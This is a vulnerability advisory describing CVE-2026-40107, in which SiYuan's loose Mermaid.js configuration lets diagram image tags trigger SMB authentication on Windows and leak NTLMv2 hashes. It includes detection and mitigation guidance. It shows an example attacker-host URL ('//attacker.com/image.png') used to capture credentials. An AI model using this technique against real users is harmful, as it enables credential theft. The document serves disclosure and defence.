CVE-2026-40107 Overview
SiYuan is a personal knowledge management system that contains a Server-Side Request Forgery (SSRF) vulnerability in its Mermaid.js diagram rendering configuration. Prior to version 3.6.4, the application configures Mermaid.js with securityLevel: "loose" and htmlLabels: true, which allows <img> tags with src attributes to survive Mermaid's internal DOMPurify sanitization and land in SVG <foreignObject> blocks. When a victim opens a note containing a malicious Mermaid diagram on Windows, protocol-relative URLs are resolved as UNC paths, triggering automatic SMB authentication and exposing the victim's NTLMv2 hash to attackers.
Critical Impact
Attackers can steal NTLMv2 authentication hashes from Windows users by crafting malicious Mermaid diagrams, enabling credential relay attacks or offline password cracking.
Affected Products
- SiYuan versions prior to 3.6.4
- SiYuan Electron client on Windows
Discovery Timeline
- 2026-04-09 - CVE CVE-2026-40107 published to NVD
- 2026-04-09 - Last updated in NVD database
Technical Details for CVE-2026-40107
Vulnerability Analysis
This vulnerability stems from an insecure configuration of the Mermaid.js diagramming library within SiYuan's Electron-based client. The root cause is the combination of securityLevel: "loose" and htmlLabels: true settings, which weakens the library's built-in protections against HTML injection.
When Mermaid.js processes diagrams with these settings, HTML elements including <img> tags pass through DOMPurify sanitization intact. These elements are then placed within SVG <foreignObject> blocks. The critical issue is that the resulting SVG content is injected into the DOM via innerHTML without any secondary sanitization step.
On Windows systems, this creates a particularly dangerous attack surface. When a malicious diagram contains an image reference using a protocol-relative URL (e.g., //attacker.com/image.png), Windows interprets this as a UNC path (\\attacker.com\image.png). The operating system then automatically attempts SMB authentication to the attacker-controlled server, transmitting the victim's NTLMv2 hash without any user interaction beyond opening the malicious note.
Root Cause
The vulnerability is classified under CWE-918 (Server-Side Request Forgery). The insecure Mermaid.js configuration allows untrusted content to trigger outbound network requests from the application. The lack of secondary sanitization on SVG content injected via innerHTML compounds the issue, permitting attacker-controlled URLs to reach the rendering engine.
Attack Vector
The attack is network-based and requires no authentication or privileges from the attacker's perspective. An attacker can craft a malicious Mermaid diagram containing a specially formatted <img> tag with a protocol-relative URL pointing to an attacker-controlled SMB server. When shared via SiYuan's note-sharing mechanisms or imported into a victim's knowledge base, opening the note triggers the credential theft.
The attack flow proceeds as follows: the malicious diagram passes through Mermaid.js processing, the <img> tag survives sanitization, the SVG is rendered via innerHTML, the Electron client attempts to fetch the image resource, and Windows automatically sends NTLMv2 credentials to the attacker's server.
Detection Methods for CVE-2026-40107
Indicators of Compromise
- Outbound SMB traffic (TCP port 445) to external IP addresses or suspicious domains
- Network connections to protocol-relative URLs or UNC paths from the SiYuan application process
- Unusual authentication events logged in Windows Security Event logs (Event ID 4624/4625 with network logon type)
Detection Strategies
- Monitor for outbound SMB connections originating from Electron-based applications
- Implement network-level detection for NTLM authentication attempts to non-corporate IP ranges
- Deploy endpoint detection rules for SiYuan processes initiating connections to unknown external hosts
Monitoring Recommendations
- Enable Windows Event logging for authentication events and correlate with SiYuan process activity
- Configure firewall rules to alert on outbound SMB traffic to non-whitelisted destinations
- Review shared SiYuan notes for suspicious Mermaid diagram content containing protocol-relative URLs
How to Mitigate CVE-2026-40107
Immediate Actions Required
- Upgrade SiYuan to version 3.6.4 or later immediately
- Block outbound SMB traffic (TCP 445) at the network perimeter for non-essential systems
- Review recently imported or shared notes for malicious Mermaid diagram content
Patch Information
The vulnerability is fixed in SiYuan version 3.6.4. Users should upgrade to this version or later to remediate the vulnerability. For detailed information about the security fix, refer to the GitHub Security Advisory.
Workarounds
- Block outbound SMB traffic at the host or network firewall level to prevent credential theft even if a malicious diagram is opened
- Avoid opening untrusted or externally-sourced SiYuan notes until the application is upgraded
- Consider disabling Mermaid diagram rendering temporarily if patch deployment is delayed
# Windows firewall rule to block outbound SMB traffic
netsh advfirewall firewall add rule name="Block Outbound SMB" dir=out action=block protocol=tcp remoteport=445
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
